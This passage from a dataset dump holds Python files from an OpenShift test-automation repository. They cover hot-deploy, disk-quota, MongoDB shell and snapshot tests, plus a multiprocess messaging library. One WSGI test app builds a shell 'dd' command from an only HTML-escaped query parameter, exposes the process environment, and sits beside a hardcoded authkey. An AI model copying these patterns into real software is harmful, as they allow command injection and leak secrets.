self.config.OPENSHIFT_user_email)\n ( ret_code, ret_output ) = self.run_rhc_admin_check()\n self.assert_false(ret_code == 0)\n \n # Everything is OK\n return self.passed(self.summary)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(RhcAdminCheck)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5630216002464294, "alphanum_fraction": 0.5739568471908569, "avg_line_length": 41.638038635253906, "blob_id": "89143fe6106e6d475dc60a98ce60e25838206bed", "content_id": "308df3d57691fc54c7c2a79b59e1949a135a27ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6950, "license_type": "no_license", "max_line_length": 157, "num_lines": 163, "path": "/automation/open/testmodules/RT/hot_deploy/hot_deploy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-07-23\n\n[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\nhttps://tcms.engineering.redhat.com/case/138803/\n\"\"\"\nimport os\nimport common\nimport OSConf\nimport rhtest\nimport time\nimport pexpect\nimport re\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'jbossews2'\n self.info(\"WARN: Missing variant, used `%s` as default\" % (self.test_variant))\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.scalable:\n self.scalable = True\n\n self.file_path = { 'jbossas' : 'src/main/webapp/index.html',\n 'python' : 'wsgi/application',\n 'ruby' : 'config.ru',\n 'php' : 'php/index.php',\n 'perl' : 'perl/index.pl',\n }\n self.file_path['jbosseap'] = self.file_path['jbossas']\n self.file_path['jbossews'] = self.file_path['jbossas']\n self.file_path['jbossews2'] = self.file_path['jbossas']\n self.file_path['ruby-1.9'] = self.file_path['ruby']\n\n self.summary = \"[US926][Runtime][rhc-cartridge]MySQL Admin(phpmyadmin) support\"\n self.app_name = \"hotdeploy\" + common.getRandomString(4)\n self.app_type = common.app_types[self.test_variant]\n self.git_repo = \"./%s\" % (self.app_name)\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass HotDeploy(OpenShiftTest):\n def get_pids(self, app_name):\n pids = []\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n cmd = \"ssh %s 'ps aux | grep -i standalone'\" % (OSConf.get_ssh_url(app_name))\n elif 'jbossews' in self.app_type:\n #cmd = \"ssh %s 'ps aux | grep 'jre'\" % (OSConf.get_ssh_url(app_name))\n cmd = \"ssh %s 'ps aux | grep 'java'\" % (OSConf.get_ssh_url(app_name))\n else:\n cmd = \"ssh %s 'ps aux | grep bin/httpd'\" % (OSConf.get_ssh_url(app_name))\n child = pexpect.spawn(cmd)\n for line in child.readlines():\n match = None\n if self.app_type.split('-')[0] in ('jbossas', 'jbosseap'):\n if 'jre' in line or 'standalone.sh' in line:\n print line\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n elif 'jbossews' in self.app_type:\n if 'jbossews//bin/tomcat' in line:\n #if 'java' in line:\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n else:\n if 'httpd -C Include' in line:\n match = re.search(r'^\\d+\\s+(\\d+)', line, re.M)\n if match:\n if match.group(1) not in pids:\n pids.append(int(match.group(1)))\n pids.sort()\n return pids\n\n def compare_pid(self, lst1, lst2):\n if len(lst1) > len(lst2):\n return False\n for i in range(len(lst1)):\n if lst1[i] != lst2[i]:\n return False\n return True\n\n def test_method(self):\n # Create app\n ret = common.create_app(self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, True, \"./\", self.scalable)\n self.assert_equal(ret, 0, \"App creation failed\")\n # Add hot_deploy marker\n ret = common.command_get_status(\"touch %s/.openshift/markers/hot_deploy\" % (self.app_name))\n self.assert_equal(ret, 0, \"Failed to create hot_deploy marker\")\n # Record the pids\n pid_lst1 = self.get_pids(self.app_name)\n print 'pid list: %s' % pid_lst1\n self.assert_not_equal(len(pid_lst1), 0, \"Failed to get pid\")\n # Make some changes and git push\n self.str1 = 'Welcome to OpenShift'\n self.str2 = common.getRandomString()\n cmd = \"sed -i -e 's/%s/%s/g' %s/%s\" % (self.str1, self.str2, self.app_name, self.file_path[self.test_variant])\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify the app\")\n # Git push all the changes\n (ret, output) = common.command_getstatusoutput(\"cd %s && git add . && git commit -amt && git push\" % (self.app_name))\n self.assert_equal(ret, 0, \"Failed to git push\")\n self.assert_not_match('Waiting for stop to finish', output, \"'Waiting for stop to finish' shouldn't be found in the output\")\n # Verify the changes\n ret = common.check_web_page_output(self.app_name, '', self.str2)\n self.assert_equal(ret, 0, \"The changes doesn't take effect\")\n # Get the pid and compare\n pid_lst2 = self.get_pids(self.app_name)\n print 'pid before git push: %s' % (pid_lst1)\n print 'pid after git push: %s' % (pid_lst2)\n self.assert_not_equal(len(pid_lst2), 0, \"Failed to get pid\")\n ret = self.compare_pid(pid_lst1, pid_lst2)\n self.assert_true(ret, 'PID changed after deploying')\n # Create jenkins server\n ret = common.create_app(\"jenkins\", common.app_types['jenkins'])\n self.assert_equal(ret, 0, \"Failed to create jenkins server\")\n # Add jenkins-client to the app\n ret = common.embed(self.app_name, 'add-' + common.cartridge_types['jenkins'])\n self.assert_equal(ret, 0, \"Failed to add jenkins-client to the app\")\n # Make some changes\n self.str1 = self.str2\n self.str2 = common.getRandomString()\n cmd = \"sed -i -e 's/%s/%s/g' %s/%s\" % (self.str1, self.str2, self.app_name, self.file_path[self.test_variant])\n ret = common.command_get_status(cmd)\n self.assert_equal(ret, 0, \"Failed to modify the app\")\n # Git push all the changes\n ret = common.trigger_jenkins_build(self.app_name)\n self.assert_true(ret, \"Failed to do jenkins build\")\n # Verify the changes\n ret = common.check_web_page_output(self.app_name, '', self.str2)\n self.assert_equal(ret, 0, \"The changes doesn't take effect\")\n # Compare the pids\n pid_lst1 = pid_lst2\n pid_lst2 = self.get_pids(self.app_name)\n print 'pid before git push: %s' % (pid_lst1)\n print 'pid after git push: %s' % (pid_lst2)\n self.assert_not_equal(len(pid_lst2), 0, \"Failed to get pid\")\n ret = self.compare_pid(pid_lst1, pid_lst2)\n self.assert_true(ret, 'PID changed after deploying')\n return self.passed()\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(HotDeploy)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.584561288356781, "alphanum_fraction": 0.5884125828742981, "avg_line_length": 33.119998931884766, "blob_id": "134793d197f3a7d58a90a18577af2db0f7f25392", "content_id": "13b8171886056fafdbffd74cf9ecd5dc03dd0ba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5972, "license_type": "no_license", "max_line_length": 107, "num_lines": 175, "path": "/automation/parallel/Communicate.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from Queue import Queue\nfrom threading import Event\ntry:\n from multiprocessing.managers import BaseManager\nexcept ImportError:\n class Python26Required(object):\n def __call__(self, *args):\n raise RuntimeError('Requires Python > 2.6')\n def __getattr__(self, name):\n raise RuntimeError('Requires Python > 2.6')\n BaseManager = Python26Required()\n\nclass _create_caching_getter(object):\n\n def __init__(self, clazz):\n self._clazz = clazz\n self._objects = {}\n\n def __call__(self, key):\n if key not in self._objects:\n self._objects[key] = self._clazz()\n return self._objects[key]\n\nclass Communicate(object):\n \"\"\"Library for communication between processes.\n For example this can be used to handle communication between processes of the Parallel robot library.\n \n Requires Python 2.6\n \n Example:\n \n Process 1 test file:\n | *Settings* |\n | Library | Communicate |\n \n \n | *Test Cases* |\n | Communicator |\n | | [Setup] | Start Communication Service |\n | | Send Message To | my message queue | hello world! |\n | | ${message}= | Receive Message From | other message queue |\n | | Should Be Equal | ${message} | hello! |\n | | [Teardown] | Stop Communication Service |\n \n Process 2 test file:\n | *Settings* |\n | Library | Communicate | ${process 1 ip address if on a different machine} |\n \n \n | *Test Cases* |\n | Helloer |\n | | ${message}= | Receive Message From | my message queue |\n | | Should Be Equal | ${message} | hello world! |\n | | Send Message To | other message queue | hello! |\n \n \"\"\"\n\n def __init__(self, address='127.0.0.1', port=2187):\n \"\"\"\n `address` of the communication server.\n `port` of the communication server.\n \"\"\"\n self._address = address\n self._port = int(port)\n self._authkey = 'live long and prosper'\n self._queue = None\n self._connected = False\n\n def _connect(self):\n self._create_manager().connect()\n self._connected = True\n\n def start_communication_service(self):\n \"\"\"Starts a communication server that will be used to share messages and objects between processes.\n \"\"\"\n self._create_manager(_create_caching_getter(Queue),\n _create_caching_getter(Event)).start()\n self._connected = True\n\n def stop_communication_service(self):\n \"\"\"Stops a started communication server. \n This ensures that the server and the messages that it has don't influence the next tests.\n To ensure that this keyword really happens place this in the teardown section.\n \"\"\"\n self._manager.shutdown()\n self._connected = False\n\n def _create_manager(self, queue_getter=None, event_getter=None):\n BaseManager.register('get_queue', queue_getter)\n BaseManager.register('get_event', event_getter)\n self._manager = BaseManager((self._address, self._port), self._authkey)\n return self._manager\n\n def send_message_to(self, queue_id, value):\n \"\"\"Send a message to a message queue.\n\n `queue_id` is the identifier for the queue.\n\n `value` is the message. This can be a string, a number or any serializable object.\n\n Example:\n In one process\n | Send Message To | my queue | hello world! |\n ...\n In another process\n | ${message}= | Receive Message From | my queue |\n | Should Be Equal | ${message} | hello world! |\n \"\"\"\n self._get_queue(queue_id).put(value)\n\n def receive_message_from(self, queue_id, timeout=None):\n \"\"\"Receive and consume a message from a message queue.\n By default this keyword will block until there is a message in the queue.\n\n `queue_id` is the identifier for the queue.\n\n `timeout` is the time out in seconds to wait.\n\n Returns the value from the message queue. Fails if timeout expires.\n\n Example:\n In one process\n | Send Message To | my queue | hello world! |\n ...\n In another process\n | ${message}= | Receive Message From | my queue |\n | Should Be Equal | ${message} | hello world! |\n \"\"\"\n timeout = float(timeout) if timeout is not None else None\n return self._get_queue(queue_id).get(timeout=timeout)\n\n def _get_queue(self, queue_id):\n if not self._connected:\n self._connect()\n return self._manager.get_queue(queue_id)\n\n def wait_for_event(self, event_id, timeout=None):\n \"\"\"Waits until event with `event_id` is signaled.\n Fails if optional timeout expires.\n\n `timeout` is the time out in seconds to wait.\n\n Example:\n In one process\n | Wait For Event | my event |\n ...\n In another process\n | Signal Event | my event |\n \"\"\"\n timeout = float(timeout) if timeout is not None else None\n self._get_event(event_id).wait(timeout=timeout)\n #NOTE! If Event#clear is ever exposed it has to be secured (for example r/w lock) that none\n #of the processes can do it while another is at this position.\n if not self._get_event(event_id).isSet():\n raise Exception('Timeout')\n\n def signal_event(self, event_id):\n \"\"\"Signals an event.\n If a process is waiting for this event it will stop waiting after the signal.\n\n `event` is the identifier for the event.\n\n Example:\n In one process\n | Wait For Event | my event |\n ...\n In another process\n | Signal Event | my event |\n \"\"\"\n return self._get_event(event_id).set()\n\n def _get_event(self, event_id):\n if not self._connected:\n self._connect()\n return self._manager.get_event(event_id)\n\n" }, { "alpha_fraction": 0.5195916295051575, "alphanum_fraction": 0.5281456708908081, "avg_line_length": 32.55555725097656, "blob_id": "29d9814be6d89c664deb709cd68c3b3b9587e105", "content_id": "ff398b5fe770f7f7700d54bdf8ffa045ed64d9fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3624, "license_type": "no_license", "max_line_length": 101, "num_lines": 108, "path": "/automation/open/testmodules/RT/limits/file_capacity.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.app_name = common.getRandomString(10)\n self.app_type = common.app_types['php']\n self.file_size_limit = 1048576\n tcms_testcase_id=122321\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n os.system(\"rm -Rf %s\" % ( self.app_name ))\n\n\nclass FileCapacity(OpenShiftTest):\n def test_method(self):\n\n step=testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n True],\n expect_description = \"App should be created successfully\",\n expect_return = 0)\n self.steps_list.append(step)\n\n every_cap = 500000\n left_limit = self.file_size_limit\n i = 0\n while left_limit > 0:\n if left_limit > every_cap:\n step = testcase.TestCaseStep(\n \"generate a %dK size file\"% every_cap,\n \"dd if=/dev/zero bs=1K count=%d of=%s/bigfile%s\"% (every_cap, self.app_name, i),\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0,\n unexpect_string_list = ['Disk quota exceeded'])\n #expect_string_list = ['remote rejected'])\n self.steps_list.append(step)\n else:\n step = testcase.TestCaseStep(\n \"generate a %dK size file\" %(left_limit),\n \"dd if=/dev/zero bs=1K count=%d of=%s/bigfile%s\" %(left_limit, self.app_name, i),\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_string_list = ['Disk quota exceeded'])\n #expect_string_list = ['remote rejected'])\n self.steps_list.append(step)\n\n\n left_limit = left_limit - every_cap\n i = i + 1\n\n step=testcase.TestCaseStep(\n \"Destroy app: %s\" % (self.app_name),\n common.destroy_app,\n function_parameters = [self.app_name],\n expect_return = 0)\n self.steps_list.append(step)\n \n case = testcase.TestCase(\"[rhc-limits] file size limit\", self.steps_list)\n case.run()\n \n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n \n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(FileCapacity)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5629578232765198, "alphanum_fraction": 0.5685385465621948, "avg_line_length": 43.10769271850586, "blob_id": "f45014e3aecac9d5ac016f0dcdf54544854f37c1", "content_id": "10257dde2c01ab0e1bf5365960c63790350cebfb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2867, "license_type": "no_license", "max_line_length": 113, "num_lines": 65, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/datadir/application", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport commands\nfrom cgi import escape\nfrom urlparse import parse_qs\n\nvirtenv = os.environ['APPDIR'] + '/virtenv/'\nos.environ['PYTHON_EGG_CACHE'] = os.path.join(virtenv, 'lib/python2.6/site-packages')\nvirtualenv = os.path.join(virtenv, 'bin/activate_this.py')\ntry:\n execfile(virtualenv, dict(__file__=virtualenv))\nexcept IOError:\n pass\n#\n# IMPORTANT: Put any additional includes below this line. If placed above this\n# line, it's possible required libraries won't be in your searchable path\n# \n\ndef application(environ, start_response):\n parameters = parse_qs(environ.get('QUERY_STRING', ''))\n ctype = 'text/plain'\n if environ['PATH_INFO'] == '/health':\n response_body = \"1\"\n elif environ['PATH_INFO'] == '/env':\n response_body = ['%s: %s' % (key, value)\n for key, value in sorted(environ.items())]\n response_body = '\\n'.join(response_body)\n elif environ['PATH_INFO'] == '/create':\n if 'size' in parameters:\n size = escape(parameters['size'][0])\n else:\n size = '300'\n cmd = 'dd if=/dev/urandom of=%sbigfile bs=1M count=%s' % (os.environ['OPENSHIFT_DATA_DIR'], size)\n (ret, output) = commands.getstatusoutput(cmd)\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile has been created.'])\n elif environ['PATH_INFO'] == '/delete':\n cmd = 'rm -f %sbigfile' % (os.environ['OPENSHIFT_DATA_DIR'])\n (ret, output) = commands.getstatusoutput(cmd)\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile has been deleted.'])\n elif environ['PATH_INFO'] == '/show':\n cmd = 'ls -lh %sbigfile' % (os.environ['OPENSHIFT_DATA_DIR'])\n (ret, output) = commands.getstatusoutput(cmd)\n if ret == 0:\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile exists.'])\n else:\n response_body = '\\n'.join(['Command: %s' % (cmd), output, 'The bigfile doesnot exist.'])\n else:\n ctype = 'text/plain'\n response_body = '''[rhc-cartridge]snapshot/restore big data to new app\n[rhc-cartridge]snapshot/restore big data to existing app'''\n\n status = '200 OK'\n response_headers = [('Content-Type', ctype), ('Content-Length', str(len(response_body)))]\n #\n start_response(status, response_headers)\n return [response_body]\n\n#\n# Below for testing only\n#\nif __name__ == '__main__':\n from wsgiref.simple_server import make_server\n httpd = make_server('localhost', 8051, application)\n # Wait for a single request, serve it and quit.\n httpd.handle_request()\n" }, { "alpha_fraction": 0.5560294985771179, "alphanum_fraction": 0.5645599365234375, "avg_line_length": 32.70588302612305, "blob_id": "28ca1e0ef4a4f7852b3f26e6fd4fd928a61fb9f4", "content_id": "cb5f91b3cda4439b3b4cc1c9eea363d93af9590d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5158, "license_type": "no_license", "max_line_length": 94, "num_lines": 153, "path": "/automation/open/testmodules/RT/node/mongodb_via_rhcsh.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nJan 12, 2012\n\n[US1350][Runtime][rhc-node]The mongoDB interactive shell\nhttps://tcms.engineering.redhat.com/case/126302/\n\"\"\"\n\nimport sys\nimport os\n\nimport rhtest\nimport testcase\nimport common\nimport OSConf\nimport pexpect\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary = \"[US1350][Runtime][rhc-node]The mongoDB interactive shell\"\n self.app_name = 'php'\n self.app_type = common.app_types[self.app_name]\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass MongodbViaRhcsh(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create an %s app: %s\" % (self.app_type, self.app_name),\n common.create_app,\n function_parameters = [self.app_name, self.app_type, \n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n 'False'],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mongodb into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-%s\"%common.cartridge_types[\"mongodb\"]],\n expect_return = 0))\n\n '''\n self.steps_list.append(testcase.TestCaseStep(\n \"embed rockmongo into app %s\"% self.app_name,\n common.embed,\n function_parameters = [self.app_name, \"add-rockmongo-1.1\"],\n expect_return = 0)\n '''\n\n self.steps_list.append(testcase.TestCaseStep(\n \"run mongo shell via rhcsh with pexpect\",\n self.mongo_shell_test,\n expect_return = 0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def mongo_shell_test(self):\n app_url = OSConf.get_app_url(self.app_name)\n ssh_url = OSConf.get_ssh_url(self.app_name)\n db_info = OSConf.get_embed_info(self.app_name, 'mongodb-2.2')\n p = pexpect.spawn('ssh %s'% ssh_url)\n p.logfile = sys.stdout\n# index = p.expect([OSConf.get_app_url(self.app_name), pexpect.EOF, pexpect.TIMEOUT])\n\n p.expect('Welcome to OpenShift shell')\n p.expect(app_url)\n p.sendline('help')\n p.expect('Help menu:')\n p.expect('interactive MongoDB shell')\n p.sendline('mongo')\n p.expect('MongoDB shell version:')\n p.expect('connecting to:')\n p.expect('>', timeout=20)\n #p.sendcontrol('c')\n p.sendline('exit')\n p.expect('bye', timeout=20)\n p.expect('.*')\n db_path = '%s:%s/%s'% (db_info['url'], db_info['port'], db_info['database'])\n self.info(\"db_path=%s\"%db_path)\n p.sendline('mongo %s'% db_path)\n p.expect('MongoDB shell version:', timeout=30)\n p.expect('connecting to: %s'% db_path, timeout=30)\n p.expect('>')\n p.sendline('db.auth(\"%s\",\"%s\")'% (db_info['username'], db_info['password']))\n p.expect('1')\n p.expect('>')\n p.sendline('help')\n p.expect('help on db methods')\n p.expect('quit the mongo shell')\n p.expect('>')\n p.sendline('db')\n p.expect(db_info['database'])\n p.sendline('show collections')\n p.expect('system.users')\n p.sendline('db.createCollection(\"test\")')\n p.expect('{ \"ok\" : 1 }')\n p.sendline('show collections')\n p.expect('test')\n p.sendline('db.test.save({\"name\":\"lilu\"})')\n p.sendline('db.test.find()')\n p.expect('\"name\" : \"lilu\"')\n p.sendline('person=db.test.findOne({ name : \"lilu\" } )')\n p.expect('\"name\" : \"lilu\"')\n p.sendline('person.name=\"newlilu\"')\n p.expect('newlilu')\n p.sendline('db.test.save(person)')\n p.sendline('db.test.find()')\n p.expect('\"name\" : \"newlilu\"')\n p.sendline('db.test.save({\"name\":\"lilu\"})')\n p.sendline('db.test.find()')\n p.expect('\"name\" : \"newlilu\"')\n p.expect('\"name\" : \"lilu\"')\n p.sendline('db.test.remove({\"name\":\"newlilu\"})')\n p.sendline('db.test.find()')\n index = p.expect(['\"name\" : \"newlilu\"', '\"name\" : \"lilu\"', pexpect.TIMEOUT])\n if index == 0 or index == 2:\n return 1\n p.sendline('exit')\n p.expect('bye')\n p.sendline('exit')\n p.expect('Connection to %s closed.'% app_url)\n return 0\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MongodbViaRhcsh)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5102836489677429, "alphanum_fraction": 0.5204210877418518, "avg_line_length": 42.28691864013672, "blob_id": "09ae5aa02c20b0d6d051207eadb1da67cc7e694a", "content_id": "b9cda67152d5c2eb9cdd9654b584f825c625046e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10259, "license_type": "no_license", "max_line_length": 130, "num_lines": 237, "path": "/automation/open/testmodules/RT/client/snapshot_restore_mysql_data_to_new_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.info(\"[US566][rhc-client]Archive an existing app with embedded mysql db and restore data to new created application\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = \"jbossews\"\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python\", \"python-2.7\",\"python-3.3\", \"wsgi\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python\",\"wsgi\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-2.7\"):\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python-3.3\"):\n file_name = \"applicationpython-3.3.py\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbosseap\", \"jbossas\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n file_name = \"test_ews.jsp\"\n source_file = \"%s/data/snapshot_restore_mysql_data/%s\"% (WORK_DIR,\n file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Unknown variant: %s\"%self.test_variant)\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n self.key_string1 = \"speaker1, title1\"\n self.key_string2 = \"speaker2, title2\"\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass SnapshotRestoreMysqlDataToNewApp(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\")\n\n self.add_step(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name])\n\n self.add_step(\"Enable embeded mysql for this app\",\n common.embed,\n function_parameters=[self.app_name, \"add-mysql-5.1\", self.user_email, self.user_passwd],\n expect_return=0)\n\n self.add_step(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return=0)\n\n if self.test_variant in (\"rack\", \"ruby\", \"ruby-1.9\"):\n modify_file = \"%s/config.ru\" %(self.app_name)\n else:\n modify_file = self.target_file\n if self.test_variant in (\"jbosseap\", \"jbossas\"):\n command = \"echo 'Skip this step for jbossas app, because these are done automatcially by jboss server at server side'\"\n elif self.test_variant in (\"jbossews\", \"jbossews2\"):\n command = ( \"cd %s/src/main/webapp/ && \"\n \" mkdir -p WEB-INF/lib && \"\n \" cp %s/../cartridge/app_template/bigdata/mysql/mysql-connector-java-5.1.20-bin.jar WEB-INF/lib/ \"\n ) % (self.app_name, WORK_DIR)\n elif self.test_variant == \"python-2.7\":\n command = \"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql.py %s/setup.py\"\n elif self.test_variant == \"python-3.3\":\n command = \"cp -f %s/../client/data/snapshot_restore_mysql_data/setupmysql33.py %s/setup.py\"\n else:\n command=\"echo 'Nothing to do'\"\n self.add_step(\"Modify test files according to mysql info\",\n command,\n expect_return=0)\n\n self.add_step(\"Do git commit\",\n \"cd %s && git add . && git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\")\n\n self.add_step(\"Access app's URL to create mysql data\",\n \"curl -H 'Pragma: no-cache' __OUTPUT__[2]/%s\" %(self.url_path1),\n expect_return=0,\n expect_str = [\"Welcome\", self.key_string1],\n try_interval=12,\n try_count=10)\n\n self.add_step(\"Take snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p '%s' %s\" \n %(self.app_name,\n \"%s.tar.gz\"%(self.app_name),\n self.user_email, \n self.user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n self.add_step(\"Destroy app\",\n common.destroy_app,\n function_parameters=[self.app_name, \n self.user_email, \n self.user_passwd,\n True],\n expect_return=0)\n\n self.add_step(\"Re-create this application\",\n 